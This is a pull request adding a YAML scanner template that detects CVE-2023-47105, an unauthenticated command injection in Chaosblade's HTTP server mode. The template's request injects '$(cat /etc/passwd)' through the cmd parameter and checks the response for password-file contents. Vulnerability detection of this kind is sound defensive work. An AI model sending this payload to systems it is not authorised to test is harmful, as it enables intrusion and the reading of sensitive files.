### PR TITLE
Create CVE-2023-47105.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-47105.yaml
+++ b/http/cves/2023/CVE-2023-47105.yaml
@@ -1,0 +1,30 @@
+id: CVE-2023-47105
+
+info:
+  name: Chaosblade - Local File Inclusion
+  author: gy741
+  severity: high
+  description: |
+    Starting from version 0.3, Chaosblade supports server mode, which exposes an HTTP service that allows users to interact with Chaosblade via HTTP requests. However, this server mode lacks authentication, and HTTP parameters are not validated before being passed to exec.CommandContext for execution.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47105
+    - https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2023-47105
+    epss-score: 0.00043
+    epss-percentile: 0.10257
+  tags: cve,cve2023,chaosblade,lfi,unauth
+
+http:
+  - raw:
+      - |
+        GET /chaosblade?cmd=$(cat%20/etc/passwd) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-47105

```
Starting from version 0.3, Chaosblade supports server mode, which exposes an HTTP service that allows users to interact with Chaosblade via HTTP requests. However, this server mode lacks authentication, and HTTP parameters are not validated before being passed to exec.CommandContext for execution
```

- References: https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO